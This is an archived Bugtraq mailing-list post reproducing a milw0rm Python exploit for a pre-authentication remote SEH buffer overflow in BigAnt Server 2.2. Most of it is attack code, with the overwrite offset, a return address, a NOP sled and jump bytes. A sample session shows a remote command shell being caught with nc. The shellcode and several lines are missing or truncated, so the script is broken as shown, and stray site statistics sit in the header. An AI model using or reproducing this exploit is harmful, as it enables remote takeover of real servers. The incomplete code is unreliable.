[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
BigAnt Server 2.2 PreAuth Remote SEH Overflow Exploit (0day)
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: BigAnt Server 2.2 PreAuth Remote SEH Overflow Exploit (0day)
- From: admin@xxxxxxxxxxxxxxxxxxxxx
- Date: 15 Apr 2008 23:30:12 -0000
PR: n/a I: 10,500 L: 0 LD: 246,240 I: 70400 Rank:
18167 Age: Feb 17, 2004 I: 0 whois source Density Links: 0|0
# BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day)
# Matteo Memelli aka ryujin
# http://www.r57shell.in - http://adult.wikipediatr.com -
# 04/13/2008
# Tested on Windows 2000 Sp4 English
# Vulnerable process is AntServer.exe
# Offset for SEH overwrite is 954 Bytes
# muts you gave me the wrong pill! it's your fault!!!
# I wanna go back to the matrix
# bt ~ # ./antserver_exploit.py -H -P 6080
# [+] Connecting to host...
# [+] Overflowing the buffer...
# [+] Done! Check your shell on
# bt ~ # nc -vv 4444
# inverse host lookup failed: Unknown host
# (UNKNOWN) [] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
# C:\WINNT\system32>
from socket import *
from optparse import OptionParser
import sys
print "[*********************************************************************]"
print "[* *]"
print "[* BigAnt Server PreAuth Remote SEH Overflow (0day) *]"
print "[* Discovered and Coded By *]"
print "[* Matteo Memelli *]"
print "[* (ryujin) *]"
print "[* www.be4mind.com - www.gray-world.net *]"
print "[* *]"
print "[*********************************************************************]"
usage = "%prog -H TARGET_HOST -P TARGET_PORT"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string",
action="store", dest="HOST",
help="Target Host")
parser.add_option("-P", "--target_port", type="int",
action="store", dest="PORT",
help="Target Port")
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT
if not (HOST and PORT):
# Tried with SEH/THREAD/PROCESS but server crashes anyway
# [*] x86/alpha_mixed succeeded, final size 698 SEH
shellcode = (
# 77F8AEDC POP POP RET User32.dll Win 2000 Sp4
evilbuf = '\x90'*252 + shellcode + '\xeb\x06\x90\x90' + \
'\xDC\xAE\xF8\x77' + '\x90'*8 + '\xE9\x82\xFC\xFF\xFF' + \
print '[+] Connecting to host...'
s = socket(AF_INET, SOCK_STREAM)
s.connect(('', 6080))
print '[+] Overflowing the buffer...'
s.send('GET ' + evilbuf + "\n\n")
print '[+] Done! Check your shell on %s:%d' % (HOST, PORT)
# milw0rm.com [2008-04-15]